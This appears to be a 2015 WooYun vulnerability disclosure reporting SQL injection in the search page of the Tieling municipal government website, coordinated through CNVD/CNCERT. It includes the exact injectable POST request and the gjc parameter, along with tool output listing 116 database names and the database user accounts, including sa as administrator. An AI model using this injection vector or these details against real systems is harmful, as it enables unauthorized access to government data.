当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148553

漏洞标题:铁岭市人民政府网站Sql注射,116个数据库

相关厂商:铁岭市人民政府

漏洞作者: 老实先生

提交时间:2015-10-22 11:52

修复时间:2015-12-10 16:50

公开时间:2015-12-10 16:50

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-22: 细节已通知厂商并且等待厂商处理中
2015-10-26: 厂商已经确认,细节仅向厂商公开
2015-11-05: 细节向核心白帽子及相关领域专家公开
2015-11-15: 细节向普通白帽子公开
2015-11-25: 细节向实习白帽子公开
2015-12-10: 细节向公众公开

简要描述:

铁岭市人民政府网站:http://www.tieling.gov.cn/
没有发现管理后台 所以没有getshell

详细说明:

POST /search.asp?table=tnews&n=搜索中心 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://**.**.**.**/
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**
Content-Length: 41
Pragma: no-cache
Cookie: ASPSESSIONIDSSTCQDAS=JGGDFAJDBCKEBNIBKPCLGMHO; _gscu_451275280=45406106w72tyl13; _gscs_451275280=45406106p7cz8l13|pv:1; _gscbrs_451275280=1; CNZZDATA1253321814=2010883184-1445405877-%7C1445405877
gjc=a%27&lm=title&Submit.x=30&Submit.y=11


参数:gjc

漏洞证明:

116个数据库:

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
available databases [116]:
[*] aqj11
[*] bsdt_qhq
[*] bsdt_tls
[*] bsdt_xfx
[*] cjda
[*] ctcg
[*] ctrd
[*] DataBase_TieLingQingHe
[*] ds
[*] dsw
[*] DSystem
[*] ewgzjj
[*] fgw
[*] gcjsbjxt
[*] gfjj
[*] GoodWomenTalent
[*] hl
[*] hs
[*] hyjh
[*] infoload
[*] infots
[*] jw2011
[*] jzxh
[*] kp
[*] ldbzw
[*] lhzt
[*] ljjggw
[*] ljmjd
[*] ljxfx
[*] lkjxx
[*] lngd
[*] lnoa
[*] lnzw
[*] lsj
[*] master
[*] mercury2_news
[*] Mercury_V2
[*] model
[*] msdb
[*] ncpaq
[*] njj
[*] Northwind
[*] pubs
[*] rfb
[*] rmyh
[*] sjj
[*] SS403_qvzengfu
[*] SS4_tllyw
[*] SS4_tlqh
[*] syw
[*] tempdb
[*] tgcjs
[*] tl_rmyh
[*] tlcd
[*] tldaxxw
[*] tldhl
[*] tldj
[*] tlfx
[*] tlfzb
[*] tlghj
[*] tlgzw
[*] tlht
[*] tljx
[*] tlkp
[*] tlld_new1
[*] tlly2005
[*] tlly2011
[*] tllyw_ssp
[*] tllyxt
[*] tlmj
[*] tlnyjd
[*] tlpd
[*] tlqd
[*] tlqggaj
[*] tlqh
[*] tlqlgk
[*] tlqsw
[*] tlrd2010
[*] tlrdhy61
[*] tlrdhy64
[*] tlrdhy71
[*] tlsslj
[*] tlswdx
[*] tlswsj
[*] tlswzl
[*] tlszf2006
[*] tlwhw
[*] tlywtz
[*] tlzf_cg
[*] tlzs
[*] tlzx
[*] tnewlnnkj
[*] tQRF
[*] tXMK
[*] tXXSP
[*] tXXZX2009
[*] tyjc
[*] tzgs
[*] tzxgk_files_up
[*] uModify
[*] wgzjj
[*] wjj
[*] xfgaj
[*] xfzf
[*] xljk
[*] xmj
[*] xnc
[*] xxdp
[*] xy
[*] ygsy
[*] ylglc
[*] yxcsc
[*] yzq
[*] zh
[*] zxqy
[*] zys


数据库用户:

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
database management system users privileges:
[*] 123
[*] BUILTIN\\Administrators
[*] ke8-pu5
[*] kp
[*] linlin2007
[*] linzhou
[*] sa (administrator)
[*] sun56
[*] sylt
[*] tlfzb
[*] tlslj
[*] tlzxqyadmin
[*] xxzxfgw001
[*] xy
[*] zhangweiadmin

修复方案:

过滤

版权声明:转载请注明来源 老实先生@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-26 16:49

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。

最新状态:

暂无